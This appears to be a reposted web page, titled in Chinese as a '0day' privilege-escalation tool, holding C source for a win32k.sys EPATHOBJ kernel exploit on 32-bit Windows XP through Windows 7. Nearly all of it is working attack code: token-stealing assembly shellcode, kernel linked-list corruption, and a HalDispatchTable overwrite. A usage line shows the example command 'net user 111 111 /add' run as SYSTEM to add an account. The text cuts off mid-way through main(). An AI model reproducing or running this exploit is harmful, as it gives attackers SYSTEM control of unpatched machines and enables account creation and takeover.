0day 提权软件 支持2K/2K3/xp/win7 32 等

#include <stdio.h> #include <STDARG.H> #include <stddef.h> #include <windows.h> //#include <ntstatus.h> #pragma comment(lib, "gdi32") #pragma comment(lib, "kernel32") #pragma comment(lib, "user32") #define MAX_POLYPOINTS (8192 * 3) #define MAX_REGIONS 8192 #define CYCLE_TIMEOUT 10000 #pragma comment(linker, "/SECTION:.text,ERW") // // win32k!EPATHOBJ::pprFlattenRec uninitialized Next pointer testcase. // // Tavis Ormandy <taviso () cmpxchg8b com>, March 2013 // POINT Points[MAX_POLYPOINTS]; BYTE PointTypes[MAX_POLYPOINTS]; HRGN Regions[MAX_REGIONS]; ULONG NumRegion = 0; HANDLE Mutex; // Log levels. typedef enum { L_DEBUG, L_INFO, L_WARN, L_ERROR } LEVEL, *PLEVEL; VOID LogInit(); VOID LogRelase(); BOOL LogMessage(LEVEL Level, PCHAR Format, ...); // Copied from winddi.h from the DDK #define PD_BEGINSUBPATH 0x00000001 #define PD_ENDSUBPATH 0x00000002 #define PD_RESETSTYLE 0x00000004 #define PD_CLOSEFIGURE 0x00000008 #define PD_BEZIERS 0x00000010 #define ENABLE_SWITCH_DESKTOP 1 typedef struct _POINTFIX { ULONG x; ULONG y; } POINTFIX, *PPOINTFIX; // Approximated from reverse engineering. typedef struct _PATHRECORD { struct _PATHRECORD *next; struct _PATHRECORD *prev; ULONG flags; ULONG count; POINTFIX points[4]; } PATHRECORD, *PPATHRECORD; PPATHRECORD PathRecord; PATHRECORD ExploitRecord = {0}; PPATHRECORD ExploitRecordExit; typedef struct _RTL_PROCESS_MODULE_INFORMATION { HANDLE Section; // Not filled in PVOID MappedBase; PVOID ImageBase; ULONG ImageSize; ULONG Flags; USHORT LoadOrderIndex; USHORT InitOrderIndex; USHORT LoadCount; USHORT OffsetToFileName; UCHAR FullPathName[ 256 ]; } RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION; typedef struct _RTL_PROCESS_MODULES { ULONG NumberOfModules; RTL_PROCESS_MODULE_INFORMATION Modules[ 1 ]; } RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES; typedef ULONG ( __stdcall *NtQueryIntervalProfile_ ) ( ULONG, PULONG ); typedef ULONG ( __stdcall *NtQuerySystemInformation_ ) ( ULONG, PVOID, ULONG, PULONG ); typedef ULONG ( __stdcall *NtAllocateVirtualMemory_ ) ( HANDLE, PVOID, ULONG, PULONG, ULONG, ULONG ); typedef ULONG ( __stdcall *NtFreeVirtualMemory_)( HANDLE, PVOID, PULONG, ULONG); NtQueryIntervalProfile_ NtQueryIntervalProfile; NtAllocateVirtualMemory_ NtAllocateVirtualMemory; NtQuerySystemInformation_ NtQuerySystemInformation; NtFreeVirtualMemory_ NtFreeVirtualMemory; ULONG PsInitialSystemProcess, PsReferencePrimaryToken, PsGetThreadProcess, WriteToHalDispatchTable, FixAddress; void _declspec(naked) ShellCode() { __asm { pushad pushfd mov esi,PsReferencePrimaryToken FindTokenOffset: lodsb cmp al, 8Dh; jnz FindTokenOffset mov edi,[esi+1] mov esi,PsInitialSystemProcess mov esi,[esi] push fs:[124h] mov eax,PsGetThreadProcess call eax add esi, edi push esi add edi, eax movsd ;add token ref count. pop esi mov esi, [esi] and esi, 0xFFFFFFF8 lea eax, [esi-0x18] mov DWORD PTR [eax], 0x016B00B5 ;fix the haltable mov eax, WriteToHalDispatchTable mov ecx, FixAddress mov [ecx], 0xC3 mov DWORD PTR [eax], ecx popfd popad ;set ret code for NtQueryIntervalProfile mov eax, [esp+0xc] mov DWORD PTR [eax+4], 1 mov DWORD PTR [eax+8], 0xC0000018 xor eax, eax ret } } DWORD WINAPI WatchdogThread(LPVOID Parameter) { // // This routine waits for a mutex object to timeout, then patches the // compromised linked list to point to an exploit. We need to do this. // LogMessage(L_INFO, "Watchdog thread %d waiting on Mutex", GetCurrentThreadId()); if (WaitForSingleObject(Mutex, CYCLE_TIMEOUT) == WAIT_TIMEOUT) { // // It looks like the main thread is stuck in a call to FlattenPath(), // because the kernel is spinning in EPATHOBJ::bFlatten(). We can clean // up, and then patch the list to trigger our exploit. // while (NumRegion--) DeleteObject(Regions[NumRegion]); LogMessage(L_ERROR, "InterlockedExchange(0x%08x, 0x%08x);", &PathRecord->next, &ExploitRecord); InterlockedExchange((PLONG)&PathRecord->next, (LONG)&ExploitRecord); } else { LogMessage(L_ERROR, "Mutex object did not timeout, list not patched"); } return 0; } void wellcome() { printf("\t\tthe win32k.sys EPATHOBJ 0day exploit\n"); printf("*******************************************************************\n"); printf("***\texploit by:<progmboy> <programmeboy@gmail.com>\t\t***\n"); printf("***\t0day finder:<Tavis Ormandy> <taviso@cmpxchg8b.com>\t***\n"); printf("***\ttested system:xp/2003/win7/2008 (*32bit*)\t\t***\n"); printf("*******************************************************************\n"); } void usage() { printf("\nusage:\n<app> <cmd> <parameter>\n"); printf("example:\napp.exe net \"user 111 111 /add\""); } BOOL FindAFixAddress( ULONG NtoskrnlBase) { FixAddress = NtoskrnlBase + FIELD_OFFSET(IMAGE_DOS_HEADER, e_res2); LogMessage(L_INFO, "Get FixAddress --> 0x%08x", FixAddress); return TRUE; } // 0x602464FF; /*jmp esp+0x60*/ // 0x51C3686A; /*push 0; ret*/ DWORD CheckMagicDword() { OSVERSIONINFOEX OSVer; DWORD dwMagic = 0; OSVer.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX); if(GetVersionEx((OSVERSIONINFO *)&OSVer)){ switch(OSVer.dwMajorVersion){ case 5: dwMagic = 0x602464FF; break; case 6: dwMagic = 0x642464FF; break; default: dwMagic = 0; } } return dwMagic; } int main(int argc, char **argv) { HANDLE Thread; HDC Device; ULONG Size; ULONG PointNum; int nret = 0; DWORD MAGIC_DWORD = CheckMagicDword(); ULONG AllocSize = 0x1000, status, NtoskrnlBase; RTL_PROCESS_MODULES module; HMODULE ntoskrnl = NULL; DWORD dwFix; ULONG Address = MAGIC_DWORD & 0xFFFFF000; LONG ret; BOOL bRet = FALSE; #ifdef ENABLE_SWITCH_DESKTOP HDESK hDesk; #endif HMODULE ntdll = GetModuleHandle( "ntdll.dll" ); wellcome(); if (argc < 2){ usage(); return -1; } if (!MAGIC_DWORD){ LogMessage(L_ERROR, "unsupported system version\n"); return -1; } LogInit(); NtQueryIntervalProfile = (NtQueryIntervalProfile_)GetProcAddress( ntdll ,"NtQueryIntervalProfile" ); NtAllocateVirtualMemory = (NtAllocateVirtualMemory_)GetProcAddress( ntdll ,"NtAllocateVirtualMemory" ); NtQuerySystemInformation = (NtQuerySystemInformation_)GetProcAddress( ntdll ,"NtQuerySystemInformation" ); NtFreeVirtualMemory = (NtFreeVirtualMemory_)GetProcAddress( ntdll ,"NtFreeVirtualMemory" ); if ( !NtQueryIntervalProfile || !NtAllocateVirtualMemory || !NtQuerySystemInformation || !NtFreeVirtualMemory){ LogMessage(L_ERROR, "get function address error\n"); LogRelase(); return -1; } // // try to allocate memory. // while (TRUE){ ret = NtAllocateVirtualMemory( (HANDLE)-1, &Address, 0, &AllocSize, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE ); if(ret < 0){ MEMORY_BASIC_INFORMATION meminfo; LogMessage(L_ERROR, "allocate memory error code 0x%08x", ret); LogMessage(L_INFO, "try to free memory"); if(VirtualQuery((LPVOID)Address, &meminfo, sizeof(meminfo))){ LogMessage(L_INFO, "meminfo state %d %d\n", meminfo.State, meminfo.Protect); } ret = NtFreeVirtualMemory((HANDLE)-1, &Address, &AllocSize, MEM_RELEASE); if (ret < 0){ LogMessage(L_ERROR, "free memory error code 0x%08x", ret); LogRelase(); return -1; } }else{ break; } } // // get the kernel info // status = NtQuerySystemIn